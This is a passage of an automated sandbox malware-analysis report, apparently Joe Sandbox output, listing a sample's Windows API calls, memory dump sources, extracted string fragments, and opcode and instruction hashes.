                                                                                        • Opcode Fuzzy Hash: 3413c8094e7f99509e446b7412833f332a54d229bf1d71e95bb1e75993972e60
                                                                                        • Instruction Fuzzy Hash: A981BE74D01229CFCB61DF24D8486E9BBB5AF48341F6085EAD809E3280EB355EE1DF16

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 059BFABB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: fad9839e5a69c662cc75bb6ad573d46c79fbbd8de92175e1a2fed9e47f4fb898
                                                                                        • Instruction ID: 91eeff9da73b7a357f5c6044d29cf608f396108ba7ab539817e16448f997addc
                                                                                        • Opcode Fuzzy Hash: fad9839e5a69c662cc75bb6ad573d46c79fbbd8de92175e1a2fed9e47f4fb898
                                                                                        • Instruction Fuzzy Hash: 564199B5D012589FDB00CFA9D984ADEFBF1BB49310F20902AE819B7250D775AA45CF64

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 059BD3D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 45b89b02469a0df99c64e3cd181747fb97b9445d06bb1c6f3412736abca38b43
                                                                                        • Instruction ID: 61adec4da5dae5880b37b005a7b595c0a2bcb0b4e94a064fed6c5691ccd32c78
                                                                                        • Opcode Fuzzy Hash: 45b89b02469a0df99c64e3cd181747fb97b9445d06bb1c6f3412736abca38b43
                                                                                        • Instruction Fuzzy Hash: 274122B0D003588FEB10CFA9D985BDDBBF2FB49304F109229E815AB295D7B4A845CF85

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059BF93A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 9ffd6722c59533e1992e30ae27fdf66793df7fddc589225860d423666a846126
                                                                                        • Instruction ID: d05de113490064cd1c41f0fb05ac31659d43c3a97c287c2bba1813dd5dcf1f8e
                                                                                        • Opcode Fuzzy Hash: 9ffd6722c59533e1992e30ae27fdf66793df7fddc589225860d423666a846126
                                                                                        • Instruction Fuzzy Hash: 2C31A8B8D002589FCF10CFA9D980ADEFBB1FB49310F10942AE815B7210D775A946CF58
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 059BF737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: d82bb62dfdb8fa9d0e2a1a6d3d5ea49267e3dc47ac04800f3f9713b47331fdd6
                                                                                        • Instruction ID: 7c78d4e6f7f3f47d00a093f6595a187251c91ed8e89d1d9e7c776bc6bef851eb
                                                                                        • Opcode Fuzzy Hash: d82bb62dfdb8fa9d0e2a1a6d3d5ea49267e3dc47ac04800f3f9713b47331fdd6
                                                                                        • Instruction Fuzzy Hash: 1A31BBB4D002589FDB10CFAAD984AEEFBF1BB49310F24806AE415B7250C778A985CF54
                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 059BD097
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 29a7179fd8b362604d99c88be8ea30137472f77aad9fd33b39b581aa3ece9048
                                                                                        • Instruction ID: de53e4ea4b145041372a32986379caab1cff157727e54ef7ffb20811b0566336
                                                                                        • Opcode Fuzzy Hash: 29a7179fd8b362604d99c88be8ea30137472f77aad9fd33b39b581aa3ece9048
                                                                                        • Instruction Fuzzy Hash: F53177B9D042589FCB10CFA9E584ADEFBB5BB19310F24902AE814B7310D775A945CF68
                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 059BF1DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: ca02226593e3bf58af0b64bcbd81969e56b0bb0fe01e298d78c85c7712667228
                                                                                        • Instruction ID: ae71c5ed41dcb908b0d51ddd6e20c05b07f928b2a343bccd0cf5646591192d05
                                                                                        • Opcode Fuzzy Hash: ca02226593e3bf58af0b64bcbd81969e56b0bb0fe01e298d78c85c7712667228
                                                                                        • Instruction Fuzzy Hash: 0E31A9B4D012189FDB14CFA9DA85ADEFBB5BB49310F10942AE815B7210C775A941CFA8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,
                                                                                        • API String ID: 0-3772416878
                                                                                        • Opcode ID: 68a60c8f2e33d51ca59d3aead4aedcf19f2b843280b52adeb3539d16628de380
                                                                                        • Instruction ID: bdde57ea18c8bb307067f2abf9d341f2e74833eda8a45756955050072f73f49c
                                                                                        • Opcode Fuzzy Hash: 68a60c8f2e33d51ca59d3aead4aedcf19f2b843280b52adeb3539d16628de380
                                                                                        • Instruction Fuzzy Hash: 6061FF74D052298FCB61EF24D854AE9BBB6AF49301F5045EAD809E3390EB315EE1DF06
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 059BE431
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 3782f64c3d062d7fede4399954c58f99bc5b54e42e34ff5a2cc3adf520b3b10b
                                                                                        • Instruction ID: 6565649b9c6228ccb8e17abdee1e776e9a707ac20a8463ed91be4daf33f7b106
                                                                                        • Opcode Fuzzy Hash: 3782f64c3d062d7fede4399954c58f99bc5b54e42e34ff5a2cc3adf520b3b10b
                                                                                        • Instruction Fuzzy Hash: B03177B8D002589FDB10CFA9D984ADEFBB5BB19310F10902AE815B7310D775A945CF69
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: lo7p
                                                                                        • API String ID: 0-3544042162
                                                                                        • Opcode ID: 81edb48b221d17bc02e9766295fa3abf0894c7f93fbd4c6c812b5a039d6ad1f5
                                                                                        • Instruction ID: 9c91f5f49294b63a4af85a17c011a6b03be8622d5d4ad49c7eedf55b8476a4dc
                                                                                        • Opcode Fuzzy Hash: 81edb48b221d17bc02e9766295fa3abf0894c7f93fbd4c6c812b5a039d6ad1f5
                                                                                        • Instruction Fuzzy Hash: 3E418E78E012199FCB44DFA9D9849DEBBF2FF89300F20906AE915A7360DB35A901CF50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: 95ee0a111bf18b501b5261e2fa045a6205909f4f0b59a091be93b0dfd677c3dc
                                                                                        • Instruction ID: efca13a7bf11915122cfff89837763acf94e0a67ab18212fead4af74d51a8198
                                                                                        • Opcode Fuzzy Hash: 95ee0a111bf18b501b5261e2fa045a6205909f4f0b59a091be93b0dfd677c3dc
                                                                                        • Instruction Fuzzy Hash: 44F0C4B1D056288FEBA8CF29C8847D9BBF1BF09301F1081E9D10DA3240EB340AC18F01
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e030de06ee9574fcd6bdda7a83ac67b7dedb88fa0e606cfa6cc6ef5bc05279b4
                                                                                        • Instruction ID: ae0418aab58a3c5ac145f41186c7a0c1655d0eee29130f361bfa93e81084e469
                                                                                        • Opcode Fuzzy Hash: e030de06ee9574fcd6bdda7a83ac67b7dedb88fa0e606cfa6cc6ef5bc05279b4
                                                                                        • Instruction Fuzzy Hash: F851CA63499A449BCBC1CA51CC867CC7B71EAF5224BCACB87A454DFF16D32DCC428A91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690484336.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_e3d000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3513fc4f0363c968c0a7ff00624135e883ef85fe2a86431557edcd8db9669d11
                                                                                        • Instruction ID: ab12a31ca52c5249003ebaa1b53ad1c4170edd71d1aeb4b048ca9eafb693fcfa
                                                                                        • Opcode ID: 7b3ea36fab1378183d60e789dfdfbc552299b66081dc21af66d2ab33d245a035
                                                                                        • Instruction ID: d449dabfc220d0f8c5885222f37a4161aec89d5f86319ddd5a80f409413c1bed
                                                                                        • Opcode Fuzzy Hash: 7b3ea36fab1378183d60e789dfdfbc552299b66081dc21af66d2ab33d245a035
                                                                                        • Instruction Fuzzy Hash: 28D1A335B042148BDB59AB7A98586BF7AB7FFD4640B04846AD447E7398DE38CC038792
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2=@$sN2
                                                                                        • API String ID: 0-1808423570
                                                                                        • Opcode ID: 1f984c07db25fe47cdb86f70d72fd5ebbef9724b1f8b4adb6eb3e50498bc74e8
                                                                                        • Instruction ID: e66e856d366a0cb7ed819a114dd5b8b63ed76e748ec3ea2ac1c459347cad72a0
                                                                                        • Opcode Fuzzy Hash: 1f984c07db25fe47cdb86f70d72fd5ebbef9724b1f8b4adb6eb3e50498bc74e8
                                                                                        • Instruction Fuzzy Hash: 729160B0E05628CBCB64DF69CA847DCBBF5BF88314F4182E5D18CA6216DB305A95DF09
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: w
                                                                                        • API String ID: 0-476252946
                                                                                        • Opcode ID: 780ea4931b4155f6d58e70a531c4da73d58e1f28ffe05e6f68946f19e9cf7322
                                                                                        • Instruction ID: 015fd43dd930d90484f11dc8b54b042ac00623e3604e3ee556f331512b6c5964
                                                                                        • Opcode Fuzzy Hash: 780ea4931b4155f6d58e70a531c4da73d58e1f28ffe05e6f68946f19e9cf7322
                                                                                        • Instruction Fuzzy Hash: E3413FB1E056588BEB5CCF6B8C4079AFAF3AFC9304F14C1BAD50CAA254DB7005869F55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 378bfd133065e398de1ef9dc02479478b9916a981cef66ece1dff556ef78ebe1
                                                                                        • Instruction ID: c8fab0cf26df42bd476002ff3247666c4c639a5670b2eb76776afa532b3b4cc6
                                                                                        • Opcode Fuzzy Hash: 378bfd133065e398de1ef9dc02479478b9916a981cef66ece1dff556ef78ebe1
                                                                                        • Instruction Fuzzy Hash: B2329A21AAE3C18FE707CB7458FA68ABF91DE42200B19C5FFC4C84B597D655900BDB12
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0ed7437e887eda1dc6950dd7070bc4b2de17286061c743500a7b2a7e334ce462
                                                                                        • Instruction ID: e0fb8c1f67853bcbb9f43aedf639d03f8081bbc5bff9800b1981e58b1280b361
                                                                                        • Opcode Fuzzy Hash: 0ed7437e887eda1dc6950dd7070bc4b2de17286061c743500a7b2a7e334ce462
                                                                                        • Instruction Fuzzy Hash: 2D618070D042498FDB05DF7AE990AAEBBF2FB84300F149539D004AB26AEB785945CF91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706039684.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5ddfece02ae5774b2ee008408f29ba6189022e3b30e6a5a34d0df686cbcd8c67
                                                                                        • Instruction ID: 8e3869cf9a435b9dd4c3ef6dcd71cc5464e250da9b7e248f6e433365e020fc38
                                                                                        • Opcode Fuzzy Hash: 5ddfece02ae5774b2ee008408f29ba6189022e3b30e6a5a34d0df686cbcd8c67
                                                                                        • Instruction Fuzzy Hash: 6E511370D042098FDB45DF7AE980B9E7BF2FB84301F149529D004AB36AEB785945CF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 698803aa5437025e07220c3b0777b9a736d56db3c68cff031f63b5a07f40bfde
                                                                                        • Instruction ID: 2229028d2873d6972d9624717382eaaed283336ab8a533d3ff3e7fd6f813d0a4
                                                                                        • Opcode Fuzzy Hash: 698803aa5437025e07220c3b0777b9a736d56db3c68cff031f63b5a07f40bfde
                                                                                        • Instruction Fuzzy Hash: 75513E71E45208CFDB45DF7AE580B9EBBF2BB88300F14D929D004AB369EB7459498F40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c8ec88536bd88f4e49ceda7cf05d9a58e5fa8e754c163c67eec5f84ce2a02c1
                                                                                        • Instruction ID: 48cdb34fddd7fc821305a81f4cd315c48399a9c973fe7bc1c7ae5c9eb0fde133
                                                                                        • Opcode Fuzzy Hash: 6c8ec88536bd88f4e49ceda7cf05d9a58e5fa8e754c163c67eec5f84ce2a02c1
                                                                                        • Instruction Fuzzy Hash: F041EFB4D00348DFEB14CFA9C985BDEBBF1BB09314F209129E819AB254D7B49985CF85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$"$$$2$:$H%B$K
                                                                                        • API String ID: 0-727289797
                                                                                        • Opcode ID: 001b834b692b029ed8728ef63e42323f549db3ed261e7e5d79fa6814df23b736
                                                                                        • Instruction ID: b5a8a4fd8a48a0b7475abfaee8da461089dd0440619f18b87f0ae6242e33854e
                                                                                        • Opcode Fuzzy Hash: 001b834b692b029ed8728ef63e42323f549db3ed261e7e5d79fa6814df23b736
                                                                                        • Instruction Fuzzy Hash: EEF0F2B0800629CFEB71CF00D8887DABAB4BB02345F6010E4D008A7280CB7A4AC5EF00
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *$-$K$S$_$r
                                                                                        • API String ID: 0-3847339943
                                                                                        • Opcode ID: d24b5f02c081103783362e50836ec3d886e1eb3eb451ce7c59f7e6adefd47ed8
                                                                                        • Instruction ID: ac816608a5afa7ea5e3916e38aa2ba15074dc4c44371a24b8d33873957ab35db
                                                                                        • Opcode Fuzzy Hash: d24b5f02c081103783362e50836ec3d886e1eb3eb451ce7c59f7e6adefd47ed8
                                                                                        • Instruction Fuzzy Hash: BB31A2B4C00629CFDB64DFA6D8487D8BBF5BB08355F1495EAE40DA2680DB780AC5DF01
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$($*$]$`$k
                                                                                        • API String ID: 0-605889203
                                                                                        • Opcode ID: c57a0ed27d13545d07e5962d49207c9daa2a037a6377814de088a31648355124
                                                                                        • Instruction ID: 5eeab87563186266b954380ff734eab9cd0325f12f8d86288a7ee047ed829ad4
                                                                                        • Opcode Fuzzy Hash: c57a0ed27d13545d07e5962d49207c9daa2a037a6377814de088a31648355124
                                                                                        • Instruction Fuzzy Hash: AF11CEB4C01628CFDBB4DF25D8483D8BAB0FB09349F2084EAD10CA2640DB780ED5AF01
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *$,$-$J$U
                                                                                        • API String ID: 0-2570058720
                                                                                        • Opcode ID: fdfeeba28eb984dfcf92986dad2f77690f986c9352d4a9c36bcb46e2a384259f
                                                                                        • Instruction ID: 62bf053a01dddcaeea5290a9bd5c75c389daf29b4d91f6b34a5a2616142af0fc
                                                                                        • Opcode Fuzzy Hash: fdfeeba28eb984dfcf92986dad2f77690f986c9352d4a9c36bcb46e2a384259f
                                                                                        • Instruction Fuzzy Hash: 80219EB4D0566ACFDB70DF29D9487ECBAB4AB08301F1480EAD409E3680DB794AD5AF01
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "$K$X$^$n+tA
                                                                                        • API String ID: 0-440443359
                                                                                        • Opcode ID: b08f27aa4803ea1b626e7f002833a8d1c3c13548af84418a90097578bc01a6c7
                                                                                        • Instruction ID: 695d448e66a3c21ba55f8e8c3a29f34754a31ed09624a459b8f4c6e57b70778c
                                                                                        • Opcode Fuzzy Hash: b08f27aa4803ea1b626e7f002833a8d1c3c13548af84418a90097578bc01a6c7
                                                                                        • Instruction Fuzzy Hash: 2D1102B0D00A68CFEBA0CF58DD447D9BAB0BF45306F5441EAD00DAA680DBB95EC49F02
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "$$$K$^$ri$B
                                                                                        • API String ID: 0-2197517709
                                                                                        • Opcode ID: e9987d20b3a00996a4e19b21b472419cda93f617c01fb4a727a9f3704c0b97c2
                                                                                        • Instruction ID: ba072fc98f2b9452872f0e33d8d24dc1bd4b2e7d7507d0f52ef54245781f6980
                                                                                        • Opcode Fuzzy Hash: e9987d20b3a00996a4e19b21b472419cda93f617c01fb4a727a9f3704c0b97c2
                                                                                        • Instruction Fuzzy Hash: 5B01C4B0841A28CFEBA4CF15DD897EABAB0AB05346F1404E9910D66281D7B94FC98F04
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "$+$G$M
                                                                                        • API String ID: 0-1281544537
                                                                                        • Opcode ID: d64517b88b68c2eb60e517b89ced236e86fb8e88933e8dd7cb3aa5e1129472d0
                                                                                        • Instruction ID: aaa3191829431dbac23872f7178f922fd4ada504c39e20b2ed7ce820186364af
                                                                                        • Opcode Fuzzy Hash: d64517b88b68c2eb60e517b89ced236e86fb8e88933e8dd7cb3aa5e1129472d0
                                                                                        • Instruction Fuzzy Hash: 0021B2B5C05629CFEB70DF55D9487D8BAF0AB09305F5480E9D109AB680DB794AC5EF01
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %$:$_$q
                                                                                        • API String ID: 0-3911180202
                                                                                        • Opcode ID: 585ea149670586804f43a988929f424a3e4799287675700e9af0638c01e8f1f9
                                                                                        • Instruction ID: 3e35c9f29f406935244363f46c2406efce3263ecc0e230cb4c4f9bd27c63ad64
                                                                                        • Opcode Fuzzy Hash: 585ea149670586804f43a988929f424a3e4799287675700e9af0638c01e8f1f9
                                                                                        • Instruction Fuzzy Hash: 66119FB0D0566C8EDBA0DF29DD447DEBAF1EB45305F0051E9900DA7280DBB95AC8CF51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %$%$6$B
                                                                                        • API String ID: 0-4084813376
                                                                                        • Opcode ID: 4dcf523de2942dd035a438359824c91327005fdf6f535db3da4e6572b69d6459
                                                                                        • Instruction ID: a93cab1f0219a25d6ea3a03d9ca41ca5e54a0a72c152b357ed0cab42b468b9c2
                                                                                        • Opcode Fuzzy Hash: 4dcf523de2942dd035a438359824c91327005fdf6f535db3da4e6572b69d6459
                                                                                        • Instruction Fuzzy Hash: E711A2B4D09268CFDB60CF25D8887D9BAB5EB04355F5085EAD44DA2241DBB80AC4DF06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *$7$8$U
                                                                                        • API String ID: 0-2522632838
                                                                                        • Opcode ID: f72b6187aefa2a0e3541c271dfbd7afb0daedcd809cad462c1f743eed8cfbff9
                                                                                        • Instruction ID: 5ebff15ef744ba2a868a68d352fc4d934df162720289ca5934a1497d51c1364b
                                                                                        • Opcode Fuzzy Hash: f72b6187aefa2a0e3541c271dfbd7afb0daedcd809cad462c1f743eed8cfbff9
                                                                                        • Instruction Fuzzy Hash: EB01C2B0905229CFEB60CF54C8487D8BBF4FB09381F5040E6E40DA3640DB385AC5AF05
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 7$V$Y$w
                                                                                        • API String ID: 0-2826047878
                                                                                        • Opcode ID: 31bb6bd07b458d9da3e85e7cefb7b51f254321e6178e35fc255e46b49a813b1d
                                                                                        • Instruction ID: 444edc6d2adddb7afecc6f4fa5f719ffd6e0749fe45ccd4cd44a829ad3385d18
                                                                                        • Opcode Fuzzy Hash: 31bb6bd07b458d9da3e85e7cefb7b51f254321e6178e35fc255e46b49a813b1d
                                                                                        • Instruction Fuzzy Hash: 2801B6B5D086288BDB65CF25DD457DABAB1BB05341F1084DA900CA7240E7795AC08F04
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$9$Q$U
                                                                                        • API String ID: 0-1045784341
                                                                                        • Opcode ID: a0b60538c066fbd6fc3d35c0982fb2b64479b6e7a7e4e76e481d5b127cf9cc61
                                                                                        • Instruction ID: ae80fa558808b4ef1d5603be0212a71670dc435ecad1c4bdecb6b3e3df371aae
                                                                                        • Opcode Fuzzy Hash: a0b60538c066fbd6fc3d35c0982fb2b64479b6e7a7e4e76e481d5b127cf9cc61
                                                                                        • Instruction Fuzzy Hash: C9F0CFB090566C8FDFA0CF25DE443DDBAF6AB5530AF0010E9910CA7240DBBA4AD4CF55
                                                                                        Strings
